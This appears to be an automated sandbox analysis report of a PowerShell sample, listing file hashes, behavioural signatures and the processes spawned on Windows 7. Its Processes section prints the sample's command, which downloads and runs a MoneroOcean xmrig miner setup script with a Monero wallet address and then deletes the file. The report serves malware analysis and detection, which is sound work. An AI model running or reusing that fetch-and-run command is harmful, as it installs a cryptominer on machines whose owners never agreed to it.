Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30/06/2023, 12:44
Static task
static1
Behavioral task
behavioral1
Sample
geQkY07V.ps1
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
geQkY07V.ps1
Resource
win10v2004-20230621-en
General
-
Target
geQkY07V.ps1
-
Size
393B
-
MD5
b36331be1b1deb5bb4701a7cdd75e68a
-
SHA1
72cc0986a6abb77f1e3cadece22e3170731b0704
-
SHA256
0cf956f28571a4236d37ba1811d9d484e7848dc52ff5e9dc44c27b330621ef78
-
SHA512
8636cea76328d04911b029e0b3c15d8cea77d8724a1bca94c4885119ca98060b6b9e3ad4064d6d797146e28c38e4d0c063aec08b90f62302e4ff5332f77abc84
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1712 powershell.exe 652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 652 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1712 wrote to memory of 652 1712 powershell.exe 29 PID 1712 wrote to memory of 652 1712 powershell.exe 29 PID 1712 wrote to memory of 652 1712 powershell.exe 29
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\geQkY07V.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " = New-Object System.Net.WebClient; = [System.IO.Path]::GetTempFileName(); += '.bat'; .DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', ); & 48DLDM8j9npYi4jN9NaAWPbTDkA2uT7TUGCciLMwX3hdTmqauo9mismgfteSQiZMbjjgEDf6kDEKASnHwWZqMV6e1WaS8ZN; Remove-Item -Force "2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5620973f41fe888925be4635077f5e0af
SHA1eab7b16af4798a2f92a69ce672fd75b8a8bfa34e
SHA2562119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a
SHA5128d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5A7NBGM19RGJ076NDY78.temp
Filesize7KB
MD5620973f41fe888925be4635077f5e0af
SHA1eab7b16af4798a2f92a69ce672fd75b8a8bfa34e
SHA2562119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a
SHA5128d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2